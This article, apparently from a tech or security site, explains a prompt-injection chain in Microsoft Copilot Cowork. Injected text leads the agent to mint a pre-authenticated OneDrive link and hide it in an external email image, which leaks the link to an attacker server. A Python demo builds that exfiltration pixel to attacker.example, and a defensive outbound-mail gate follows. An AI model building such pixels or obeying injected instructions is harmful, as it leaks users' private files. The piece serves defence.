Microsoft Copilot Cowork shows how office agents can become file-leak channels
An AI agent, email and a shareable link create a risky outbound channel.
- ★Copilot Cowork could send an email to the user without additional approval.
- ★An external image in the message can load a URL from an attacker server.
- ★OneDrive pre-authenticated links make the leak chain especially dangerous.
The most dangerous part of the Microsoft Copilot Cowork story is not an exotic exploit that needs a cinematic attack. It is an ordinary business workflow: an agent completes a task, sends an email to the user and renders content inside that message. In a demo, that looks like useful automation. In a security model, it is read access, write access and an outbound network side effect chained together in a single step.
According to the account published by Simon Willison, Copilot Cowork could send messages to the user's own inbox without additional approval. The problem begins once the agent has already absorbed a malicious instruction through prompt injection, which needs nothing more than attacker-controlled text in something the agent reads. The attacker does not need to log into the user's account at all. It can be enough to make the agent embed an external image, meaning a URL that the email client fetches from a remote server when the user opens the message, and the attacker decides what that URL contains.
That pattern is not new in web security, but it becomes much sharper with AI agents. The agent is not merely rendering text. It may have access to documents, email, files and tools that create real side effects. If a model can read a private file, compose an email and cause a network request through a rendered image, the boundary between helpful assistant and data-exfiltration channel becomes dangerously thin.
Willison has described this class of problem through the lethal trifecta: access to private data, exposure to untrusted instructions and the ability to send information outward. Copilot Cowork is a concrete example of that three-part combination. It does not matter much that the interface is polished or that the task looks legitimate on paper. What matters is that the agent can see private context and produce output that an outside system can record.
Prompt injection, external email images and OneDrive pre-authenticated links create a dangerously short path from private file to attacker server.
An external image inside a message can become a quiet data-leak mechanism.
The sharp edge in this case is OneDrive. The source description says OneDrive can create pre-authenticated download links, that is, links that grant access to a file without a further sign-in. If prompt injection convinces the agent to create such a link for a file and then place it inside the URL of an external image, opening the email generates a request to an attacker-controlled server. The request URL, and therefore the attacker's server log, carries the link itself, which is everything needed to download the file. The request is made by the user's own mail client, so nothing about it looks unusual from the user's side.
This is exactly the kind of risk that cannot be solved by a better system prompt alone. System instructions can help, but they are not a hard enough security boundary when a product has access to documents, communication and network effects. Relying on the recipient's mail client to block remote images is not a fix either: that setting belongs to the user, not the product, and it does nothing for a share link placed in the message text. The controls have to be architectural: per-action permissions, blocking external content in agent-generated messages, separating private-file reads from outbound data flows, and requiring explicit confirmation when shareable links are created.
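The chain described above, reduced to its mechanics, as an added example that is not taken from Willison's write-up or from Microsoft's product. The share-link format, the `onedrive.example` and `attacker.example` hosts and the log line are all constructed placeholders; the mail client is simulated by a function that returns the image URL it would fetch.

```python
import re
from urllib.parse import parse_qs, urlencode, urlparse

# Constructed placeholders (hypothetical): a pre-authenticated download link in an
# invented format, and an attacker-controlled collector URL. Neither is a real
# OneDrive URL or a real host.
SHARE_LINK = "https://onedrive.example/download?authkey=PLACEHOLDER-TOKEN&id=Q3-forecast.xlsx"
COLLECTOR = "https://attacker.example/pixel.gif"


def build_exfil_image(share_link: str, collector: str = COLLECTOR) -> str:
    """What an injected instruction gets the agent to emit: a 1x1 external image
    whose URL carries the pre-authenticated link as a query parameter."""
    return f'<img src="{collector}?{urlencode({"u": share_link})}" width="1" height="1">'


def compose_email(summary: str, hidden_img: str) -> str:
    """An ordinary-looking agent message with the image appended to the body."""
    return f"<html><body><p>{summary}</p>{hidden_img}</body></html>"


def client_fetch(html: str) -> str:
    """Simulate a mail client that loads remote images: return the URL it requests.
    The request comes from the victim's own client, so it looks like normal traffic."""
    m = re.search(r'<img[^>]*\ssrc="([^"]+)"', html)
    return m.group(1)


def access_log_line(request_url: str, client_ip: str = "203.0.113.7") -> str:
    """Constructed Common Log Format line as the collector would record it
    (203.0.113.7 is a documentation address, the timestamp is a placeholder)."""
    u = urlparse(request_url)
    return f'{client_ip} - - [01/Jan/1970:00:00:00 +0000] "GET {u.path}?{u.query} HTTP/1.1" 200 43'


def recover_from_log(line: str) -> str:
    """Attacker side: one regex over the access log recovers the link, and with it the file."""
    path = re.search(r'"GET (\S+) HTTP', line).group(1)
    return parse_qs(urlparse(path).query)["u"][0]


if __name__ == "__main__":
    msg = compose_email("Your quarterly summary is ready.", build_exfil_image(SHARE_LINK))
    leaked = recover_from_log(access_log_line(client_fetch(msg)))
    print("collector log holds:", leaked)
```

Nothing in the chain requires the attacker to touch the victim's account: the agent mints the link, the agent writes the message, the victim's own client makes the request, and the attacker reads a log file.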
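One of the architectural controls listed above, as an added example written for this page rather than taken from Microsoft's product or Willison's post: a gate that inspects the message an agent wants to send, refuses anything the recipient's client would fetch from a remote host, and turns any link to a sensitive file store into a human confirmation step. The `SENSITIVE_HOSTS` list and the `onedrive.example` placeholder are assumptions standing in for whatever file stores a deployment can mint pre-authenticated links from.

```python
import re
from html.parser import HTMLParser
from urllib.parse import parse_qsl, unquote, urlparse

# Hypothetical policy inputs. onedrive.example is a placeholder standing in for a
# file store that can mint pre-authenticated links; it is not a real domain.
SENSITIVE_HOSTS = {"onedrive.example"}
# Tags whose src a mail client may fetch without any user action.
FETCHING_TAGS = {"img", "source", "video", "audio", "iframe", "object", "embed"}
URL_RE = re.compile(r"https?://[^\s\"'<>]+")


class _RefCollector(HTMLParser):
    """Collect src/href values from tags a client may fetch or a user may click."""

    def __init__(self):
        super().__init__()
        self.fetched, self.clickable = [], []

    def handle_starttag(self, tag, attrs):
        a = {k: v for k, v in attrs if v is not None}
        if tag in FETCHING_TAGS and "src" in a:
            self.fetched.append(a["src"])
        if tag == "a" and "href" in a:
            self.clickable.append(a["href"])


def _is_sensitive(url: str) -> bool:
    return (urlparse(url).hostname or "").lower() in SENSITIVE_HOSTS


def _urls_nested_in(url: str):
    """URLs smuggled inside another URL's query string, after one level of decoding."""
    for _, value in parse_qsl(urlparse(url).query, keep_blank_values=True):
        yield from URL_RE.findall(unquote(value))


def review_outbound(html: str) -> dict:
    """Gate an agent-composed message before it leaves the system.

    block:   the client would fetch something from a remote host on open (a tracking
             pixel or a pixel carrying a file link), or a sensitive link is hidden
             inside another URL's query string; the message does not go, no prompt.
    confirm: a link to a sensitive file store appears in plain view (text or href);
             sharing a file is a human decision, not an agent decision.
    send:    nothing of the above was found.
    """
    collector = _RefCollector()
    collector.feed(html)
    findings = set()

    for src in collector.fetched:
        if urlparse(src).scheme.lower() in ("http", "https"):
            findings.add(("remote_fetch", src))
    for url in collector.fetched + collector.clickable + URL_RE.findall(html):
        if _is_sensitive(url):
            findings.add(("share_link", url))
        for inner in _urls_nested_in(url):
            if _is_sensitive(inner):
                findings.add(("share_link_in_query", inner))

    kinds = {kind for kind, _ in findings}
    if "remote_fetch" in kinds or "share_link_in_query" in kinds:
        action = "block"
    elif "share_link" in kinds:
        action = "confirm"
    else:
        action = "send"
    return {"action": action, "findings": sorted(findings)}
```

The ordering is deliberate. A remote fetch is blocked outright rather than sent for confirmation, because a user looking at an email cannot tell a harmless tracking pixel from an exfiltration pixel, and a share link buried in another URL's query string is treated the same way. Only a share link in plain view is something a human can meaningfully approve, which is why that case becomes a confirmation rather than a refusal.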
This story is filed under AI, but the core issue is product security. Microsoft Copilot is increasingly positioned as a layer that connects apps, files and communication. That is why cases like this are not edge cases for users. The more useful the agent becomes, the greater the damage if it can connect private context to an outbound channel nobody is watching.
The sober conclusion is simple: agents should not automatically receive the combined powers of reading, deciding and sending just because that looks elegant in a demo. If a system can create a document link by itself and then generate a message that loads a remote resource, the security model has to assume someone will try to turn that flow into exfiltration.